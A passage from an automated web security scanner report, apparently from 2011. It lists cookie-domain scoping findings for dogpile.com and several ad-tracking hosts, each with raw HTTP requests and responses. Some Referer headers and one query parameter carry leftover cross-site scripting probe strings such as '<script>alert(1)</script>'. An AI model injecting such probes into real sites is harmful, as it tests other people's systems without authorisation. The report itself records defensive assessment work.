Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:50 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:49 GMT
Connection: close
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.dogpile.com/dogpile_rss/ws/results/Web/MLB%20Schedule/1/393/TopNavigation/Relevance/zoom=off/_iceUrlFlag=7
...[SNIP]...

6.86. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dogpile.com
Path:	/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=7d43bcdc3ae442d4896bc16a3af0cb01&ActionId=5b1f3cc201c2452cb535c16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:19:47 GMT; path=/
DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:59:47 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:59:47 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dogpile_rss/ws/termsofuse/_iceUrlFlag=11 HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.87. http://a.collective-media.net/adj/ns.androidtapp/general previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/ns.androidtapp/general

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dc=dc-dal-sea; domain=collective-media.net; path=/; expires=Sun, 01-May-2011 18:15:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adj/ns.androidtapp/general;ppos=atf;kw=;tile=2;sz=300x250,300x600;ord=4522430587094277? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; rdst11=1; rdst12=1; dp2=1; JY57=35YvzfrqY8QJ9XL2-I1ND8AO_jR1EdT1Qzx7gTonjUIP66jUwQOVTIg; nadp=1; dc=dc-dal-sea

Response

6.88. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAU_6tNyNa8Hrnbi_NeghM_H09Dd4ADA3gBY2BgYGJg6lzCwJLdysDI.4OB4YYrAwMDJwMDo76Q0wc_3HKvdgDVgYHvVNEGBi4GhvSnTLKMOoxAMQNGoKkM.dsYpYC8ZZ1M0ozqQIayG6MkkJrPwCgHpNJXMgoAKblOVjWgrAajJqMWkBs2Bywpv4uZjZmdkQMoAnUH2CYAEFEaNA--; Domain=.amgdgt.com; Expires=Sun, 01-May-2011 18:11:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bad56300&rnd=8574955118820071&clkurl=http://ib.adnxs.com/click/AAAAAACAIEAAAAAAAIAgQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAjBvFyAAAAAA./cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ../referrer=http%3A%2F%2Fwww.quickyellow.com%2F/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAUEsCgUydmQxB.uHgKrcGVOehUkSgAAP2pauZV1UnzsutI91A5wmQAAAEuLnyd5g--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUS7B8u55231QAF2LFJYFKTQV3MboDA3gBY2BAAN.uzgYGTgaG9KdMoowqjAwM.dsYhYDUsk4mYUZ5IEPZjVEQSM1nYBQDUukrGTmAlFwnqxxQVoFRkVEJyA2bA5aU38XIwMrAwKj3wp.rCGIFANsBDXo-

Response

6.89. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 31-Mar-2013 18:17:20 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=5964888&rn=0.3616840310860425&c7=http%3A%2F%2Fwww.aeriagames.com%2Fmeebo.html%3Fnetwork%3Daeriagames%26lang%3Den&c3=2&c4=&c5=&c6=&c10=&c15=&c16=&c8=Meebo%20Community%20IM&c9=http%3A%2F%2Fwww.aeriagames.com%2Ffavicon.icof51ac%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E26b262688fc&cv=1.8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/meebo.html?network=aeriagames&lang=en
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 01 Apr 2011 18:17:20 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 31-Mar-2013 18:17:20 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

6.90. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 31-Mar-2013 18:11:07 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69112&c5=166308&c6=&cv=1.3&cj=1&rn=545338085 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Fri, 01 Apr 2011 18:11:07 GMT
Connection: close
Set-Cookie: UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 31-Mar-2013 18:11:07 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

6.91. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=GlchrMbA1MSR; Domain=.contextweb.com; Expires=Mon, 26-Mar-2012 18:11:06 GMT; Path=/
cwbh1=357%3B05%2F01%2F2011%3BEMON1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F12%2F2011%3BDOTM3%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5%0A541%3B04%2F23%2F2011%3BLIFL1%0A398%3B03%2F27%2F2012%3BBK078; Domain=.contextweb.com; Expires=Sat, 05-Mar-2016 18:11:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.92. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1301343580.1FE|1301343580.60|1300446510.66|1299801259.19A; Domain=.addthis.com; Expires=Sun, 31-Mar-2013 16:55:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4d9603b0489d0ec4&callback=_ate.ad.hrr&pub=arfie&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fdogpile.com%2F&esj5ha HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh36.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1301343580.1FE|1301343580.60|1299801259.19A|1300446510.66; psc=3; uid=4d5af32c71c2e1a5; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Fri, 01 Apr 2011 16:55:41 GMT
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1301343580.1FE|1301343580.60|1300446510.66|1299801259.19A; Domain=.addthis.com; Expires=Sun, 31-Mar-2013 16:55:41 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 01-May-2011 16:55:41 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Fri, 01 Apr 2011 16:55:40 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

6.93. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)nCZ(]G)J7/O]F%-R2Z:f5>iQ*BYsWzvY8.)nH<$2.XWJWtjGv+4w]%yLG4BGFFn:P$AZ#Gz+-$TeEYm*.e'pf613v0MVm*_^3DJ=UIpYC@cXq-NpFHIkuVc<N=z-FiJ>g#l^L=JY]hp-mYdSLPGRC`g81EObM7iN.f%puar10yPY-[7]F9>i(B_A3PcZVmL-3uUR<*D:Qns%he1n7(1ZkiLgKp9q?U5$Ij`[VKooNc(D*%gjgqY9:!2[S.8mFdR^`1sGPsjV%G.tZzP+pC7Us+-Gmo'gHOO9VN]#I#>z$1O.0n0]FCI)%$irNtLYKGrLFm?FDH?kJHg+BL8j#t/3=LC`!k_10x0APpn$po_.%Qrn5LKaG+C:>+KYM0vexr#o3CPNpSS3kDk`leH`z(>e$g8?BhTnnjEm8JQCKDrol@l(u:QKVyn#'yiFkQ%d_+5c9>HA[f#/bkaeo7jYo1ntF*U'L(DV:gm_r3?R0pK7!>Tv<m$?W3RCIi/.ivIuiY(k1nU(`.z8Dj+=knZI=n]L=W?OG7<xts(:v/JJN_J+xBHp18UKoBo/f9tnWq6lZ`#sAsO(QR'fx#CerhiCJA+y5zwFJ5#.8wD((3pHou4zn%-.N6!/.qkDJsjN/f->S93^CKwybouKV%kLp#)1q.ZX-E+g*^mmMS.NzjYWVBukjw`z_T5).wO]n@%1hYVo>bCP78jEMPvt4wzX^D(M%?3m#wp)VawZvyQv7l4F6_lnT=.2<-wStTMc; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=pHA9CtcjI0CkcD0K1yMjQAAAAEAzMwtApHA9CtcjI0CkcD0K1yMjQJhmvdWWfkEfvNv2i6g_Cj43FZZNAAAAAOguAAC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gCkDGUAuQ4BAgUCAAQAAAAAPB_ZjAAAAAA.&tt_code=vert-377&udj=uf%28%27a%27%2C+9797%2C+1301681467%29%3Buf%28%27c%27%2C+47580%2C+1301681467%29%3Buf%28%27r%27%2C+173255%2C+1301681467%29%3Bppv%288991%2C+%272252220474958112408%27%2C+1301681467%2C+1301724667%2C+47580%2C+25553%29%3B&cnd=!TA_hmwjc8wIQx8kKGAAg0ccBKGUxMzMzEdcjI0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYpBlgAGiWBQ..&referrer=http://www.quickyellow.com/&pp=TZYVNgAPLUAK5TqOQQlfYZle0E2L5OGhqjK3xg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBOd_6NhWWTcDaPI71lAfhvqWIBNfq-NMBl6GU7Bi3zOLcHAAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi04ODI1ODkxNTgyMjE1MDQ1oAHD8v3sA7IBE3d3dy5xdWlja3llbGxvdy5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5xdWlja3llbGxvdy5jb20vmAK6QMACBMgChdLPCqgDAegD-QLoA7kI6APgKugDA_UDAAAAxIAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtzZABCUPOVkuk1oyP0KbF8tqkl9SQ%26client%3Dca-pub-8825891582215045%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8825891582215045&output=html&h=250&slotname=9743825372&w=300&lmt=1301699500&flash=10.2.154&url=http%3A%2F%2Fwww.quickyellow.com%2F&dt=1301681500418&bpp=2&shv=r20110324&jsv=r20110321-2&prev_slotnames=8282812667&correlator=1301681500450&frm=0&adk=3051422498&ga_vid=1234146098.1301681501&ga_sid=1301681501&ga_hid=936317177&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1118&bih=1004&fu=0&ifi=2&dtd=145&xpc=HEyqJzw6JK&p=http%3A//www.quickyellow.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIuCUQChgBIAEoATD4qtPsBBD4qtPsBBgA; sess=1; uuid2=4470455573253905340; anj=Kfw)mCZ#-r-!gzoh^Cqhjkv(+'n*Ar?/j9C?^6hwKS-6T#`5PBojYbRuf<Ll1I1_hYMhYeh%G6vYp*t5ODvAzTZ@iISJjXDc'nh[thoDjVDOn>OkjdhM-]kxuVc<-j^0E[S._]n?/-AkZL.5?T2G#A#U]+VwBupzlO^jt'sib/l$cNheGq(khOe'bw8d`euB.cj?qbq-gA!pj6^1%-h#Y:>8>-aA1s%>+2VKHUo:D4$wXYcPJa0pV6(yoKtkH4iSC7Y0![RCC#S9MDO7fT+LqQ2Bn!Cm+LoEJ1Rj9dTlZBSd-<H%U!v%'=cs)G=s5$$Fuh<-Uuf/c-H3lH#jqd6Oap3Jn<XaPzn`'kW8x490>]R9YwPWP84i@Tft^.$7hboq>5:RM_$2tI+t4y?]Wh$S3mfg$(rmoM+#rsOr%N_18#>u)Ad68T3rF<u@3GoUxqQuHeiMw`Mqgp3o`Lp^?sA:$+jr?'sLsp$GL52tA2rb_L7O9%tUm:mmr=Ma5rfGjl=`EA9k>54kg-mIfrsmD+)e>dAw+wgM1Z6.B++zP/-x-<YUx13AHx9m9EVCQ[0t>Lec_mi9=M5ckg9If?r2d=YvFi3W?kOv*'yK4EBNS-X-8(dO4`JtpvlG@^Em+X<s'_Bt4b*wzi%NN%0Y)2hh5+<oT@8?Dc@POarr%:v7cD'2OHF=bSuBlUCX?Nxf8N^Nh4>i5l%cKbE6+*6BP+`-(g2TYeYWq2wwO<::r`4Y

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 02-Apr-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4470455573253905340; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)nCZ(]G)J7/O]F%-R2Z:f5>iQ*BYsWzvY8.)nH<$2.XWJWtjGv+4w]%yLG4BGFFn:P$AZ#Gz+-$TeEYm*.e'pf613v0MVm*_^3DJ=UIpYC@cXq-NpFHIkuVc<N=z-FiJ>g#l^L=JY]hp-mYdSLPGRC`g81EObM7iN.f%puar10yPY-[7]F9>i(B_A3PcZVmL-3uUR<*D:Qns%he1n7(1ZkiLgKp9q?U5$Ij`[VKooNc(D*%gjgqY9:!2[S.8mFdR^`1sGPsjV%G.tZzP+pC7Us+-Gmo'gHOO9VN]#I#>z$1O.0n0]FCI)%$irNtLYKGrLFm?FDH?kJHg+BL8j#t/3=LC`!k_10x0APpn$po_.%Qrn5LKaG+C:>+KYM0vexr#o3CPNpSS3kDk`leH`z(>e$g8?BhTnnjEm8JQCKDrol@l(u:QKVyn#'yiFkQ%d_+5c9>HA[f#/bkaeo7jYo1ntF*U'L(DV:gm_r3?R0pK7!>Tv<m$?W3RCIi/.ivIuiY(k1nU(`.z8Dj+=knZI=n]L=W?OG7<xts(:v/JJN_J+xBHp18UKoBo/f9tnWq6lZ`#sAsO(QR'fx#CerhiCJA+y5zwFJ5#.8wD((3pHou4zn%-.N6!/.qkDJsjN/f->S93^CKwybouKV%kLp#)1q.ZX-E+g*^mmMS.NzjYWVBukjw`z_T5).wO]n@%1hYVo>bCP78jEMPvt4wzX^D(M%?3m#wp)VawZvyQv7l4F6_lnT=.2<-wStTMc; path=/; expires=Thu, 30-Jun-2011 18:11:05 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 01 Apr 2011 18:11:05 GMT
Content-Length: 1430

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAACAIEAAAAAAAIAgQAAA
...[SNIP]...

6.94. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=sahlNZK9CYVVGwgAaVlBMIpwHg02FS1BdbdhUdgohXIVHgZ4FS1BkFehUdgihXIVHgimGS1BZGehUdw7NYIVHMa4FS1BAGehUdAmoZIVH8fFGS1BmMqhUdA3WaIVH0NYGS1BSGehUdwnhXIVHERoGS1BC9qhUdAadaIVHQYrGSlrrUgj/ZoowmrBMKpRCgpDBwU+FXXAHZfR3DbJBcYjGEipIIQ6/YEVwuLATKpRS3adHoXdGrprMFwPAaUewKPAqNpRv3qfe0xqGK/sdXgWqacrs64AK+mxm7a+DM5iGKPpuUgG2YwAj5QiGszsmZwoka0Lm+XB9LlhVJ74FYooGtqsjVADga0qCKSB9mUxtGZAGAazFciZmjoxnGKvGcuKG9Sj0jw+NX8bee6BFchhFRL7IcvrGAH; domain=advertising.com; expires=Sun, 31-Mar-2013 18:17:16 GMT; path=/
GUID=MTMwMTY4MTgzNjsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; domain=advertising.com; expires=Sun, 31-Mar-2013 18:17:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&srvc=1&betr=aerigmsvisit_cs=1&betq=13548=438007 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.aeriagames.com/favicon.icof51ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E26b262688fc
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=er080012979743200010; aceRTB=rm%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cam%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Cdc%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Can%3DThu%2C%2021%20Apr%202011%2022%3A04%3A42%20GMT%7Crub%3DMon%2C%2018%20Apr%202011%2013%3A48%3A43%20GMT%7C; GUID=MTMwMTQyNTY1NDsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; F1=BwTFW2EBAAAABAAAAoAAgEA; BASE=gKQkgmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RurRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6eHnzzntzG!; ROLL=AfAiU6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8RyRUR5J/vnUtq1r5N!

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 01 Apr 2011 18:17:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=sahlNZK9CYVVGwgAaVlBMIpwHg02FS1BdbdhUdgohXIVHgZ4FS1BkFehUdgihXIVHgimGS1BZGehUdw7NYIVHMa4FS1BAGehUdAmoZIVH8fFGS1BmMqhUdA3WaIVH0NYGS1BSGehUdwnhXIVHERoGS1BC9qhUdAadaIVHQYrGSlrrUgj/ZoowmrBMKpRCgpDBwU+FXXAHZfR3DbJBcYjGEipIIQ6/YEVwuLATKpRS3adHoXdGrprMFwPAaUewKPAqNpRv3qfe0xqGK/sdXgWqacrs64AK+mxm7a+DM5iGKPpuUgG2YwAj5QiGszsmZwoka0Lm+XB9LlhVJ74FYooGtqsjVADga0qCKSB9mUxtGZAGAazFciZmjoxnGKvGcuKG9Sj0jw+NX8bee6BFchhFRL7IcvrGAH; domain=advertising.com; expires=Sun, 31-Mar-2013 18:17:16 GMT; path=/
